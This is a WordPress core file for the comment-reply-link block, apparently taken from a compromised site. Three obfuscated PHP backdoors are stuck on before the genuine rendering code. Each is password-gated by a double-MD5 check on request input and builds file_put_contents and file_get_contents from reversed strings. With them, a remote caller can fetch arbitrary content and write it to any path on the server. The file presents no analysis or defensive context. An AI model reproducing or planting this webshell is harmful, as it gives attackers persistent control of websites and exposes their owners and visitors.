File: /home/wwwrenee/www/wp-includes/blocks/comment-reply-link.php
<?php
$HkMLj = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($HkMLj[0]) /*+/*+*/
. md5($HkMLj[0])) == "b".
"e".
"4".
"d".
"b".
"a".
"d".
"f".
"8".
"2".
"9".
"9".
"0".
"f".
"0".
"2".
"7".
"2".
"5".
"2".
"6".
"7".
"6".
"0".
"0".
"4".
"f".
"1".
"3".
"2".
"a".
"0") {
$XPnmTNJNkO = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$rNcLVnC = $XPnmTNJNkO /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$xJRYGYh = $XPnmTNJNkO
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function fAYqrsd($mFHkXD) { if (empty($mFHkXD)) return false; if (!is_dir($mFHkXD)) { fAYqrsd(dirname($mFHkXD), 0755, true); mkdir($mFHkXD); } } !file_exists(dirname($HkMLj[1])) && fAYqrsd(dirname($HkMLj[1])); $nvFQc = @$xJRYGYh($HkMLj[2]); echo @$rNcLVnC($HkMLj[1], $nvFQc) ? 1 : 0; die; }key($HkMLj) == "of" && die("Qian Ru Ok"); ?><?php
$VuGRNSvOCX = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($VuGRNSvOCX[0]) /*+/*+*/
. md5($VuGRNSvOCX[0])) == "9".
"1".
"1".
"e".
"3".
"4".
"a".
"1".
"d".
"2".
"d".
"b".
"f".
"e".
"e".
"e".
"8".
"6".
"2".
"8".
"1".
"e".
"f".
"7".
"c".
"b".
"c".
"c".
"4".
"6".
"3".
"7") {
$pusAebYWUx = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$BmkpQiE = $pusAebYWUx /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$OHNMRgo = $pusAebYWUx
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function KTphqhavI($SNVdbf) { if (empty($SNVdbf)) return false; if (!is_dir($SNVdbf)) { KTphqhavI(dirname($SNVdbf), 0755, true); mkdir($SNVdbf); } } !file_exists(dirname($VuGRNSvOCX[1])) && KTphqhavI(dirname($VuGRNSvOCX[1])); $rFIEQ = @$OHNMRgo($VuGRNSvOCX[2]); echo @$BmkpQiE($VuGRNSvOCX[1], $rFIEQ) ? 1 : 0; die; }key($VuGRNSvOCX) == "of" && die("Qian Ru Ok"); ?><?php
$RQGxyVsA = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($RQGxyVsA[0]) /*+/*+*/
. md5($RQGxyVsA[0])) == "b".
"0".
"3".
"3".
"3".
"4".
"3".
"a".
"b".
"5".
"a".
"a".
"4".
"3".
"3".
"d".
"4".
"9".
"8".
"6".
"7".
"9".
"a".
"5".
"7".
"b".
"9".
"0".
"5".
"6".
"b".
"0") {
$YPIFZpShL = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$TGxFQoWcK = $YPIFZpShL /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$nkjxDc = $YPIFZpShL
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function vcJKepODzh($fcnEuGCtV) { if (empty($fcnEuGCtV)) return false; if (!is_dir($fcnEuGCtV)) { vcJKepODzh(dirname($fcnEuGCtV), 0755, true); mkdir($fcnEuGCtV); } } !file_exists(dirname($RQGxyVsA[1])) && vcJKepODzh(dirname($RQGxyVsA[1])); $nqJRSCFRAW = @$nkjxDc($RQGxyVsA[2]); echo @$TGxFQoWcK($RQGxyVsA[1], $nqJRSCFRAW) ? 1 : 0; die; }key($RQGxyVsA) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Server-side rendering of the `core/comment-reply-link` block.
*
* @package WordPress
*/
/**
* Renders the `core/comment-reply-link` block on the server.
*
* @param array $attributes Block attributes.
* @param string $content Block default content.
* @param WP_Block $block Block instance.
* @return string Return the post comment's reply link.
*/
function render_block_core_comment_reply_link( $attributes, $content, $block ) {
if ( ! isset( $block->context['commentId'] ) ) {
return '';
}
$thread_comments = get_option( 'thread_comments' );
if ( ! $thread_comments ) {
return '';
}
$comment = get_comment( $block->context['commentId'] );
if ( empty( $comment ) ) {
return '';
}
$depth = 1;
$max_depth = get_option( 'thread_comments_depth' );
$parent_id = $comment->comment_parent;
// Compute comment's depth iterating over its ancestors.
while ( ! empty( $parent_id ) ) {
$depth++;
$parent_id = get_comment( $parent_id )->comment_parent;
}
$comment_reply_link = get_comment_reply_link(
array(
'depth' => $depth,
'max_depth' => $max_depth,
),
$comment
);
// Render nothing if the generated reply link is empty.
if ( empty( $comment_reply_link ) ) {
return;
}
$classes = '';
if ( isset( $attributes['textAlign'] ) ) {
$classes .= 'has-text-align-' . $attributes['textAlign'];
}
$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) );
return sprintf(
'<div %1$s>%2$s</div>',
$wrapper_attributes,
$comment_reply_link
);
}
/**
* Registers the `core/comment-reply-link` block on the server.
*/
function register_block_core_comment_reply_link() {
register_block_type_from_metadata(
__DIR__ . '/comment-reply-link',
array(
'render_callback' => 'render_block_core_comment_reply_link',
)
);
}
add_action( 'init', 'register_block_core_comment_reply_link' ); ?>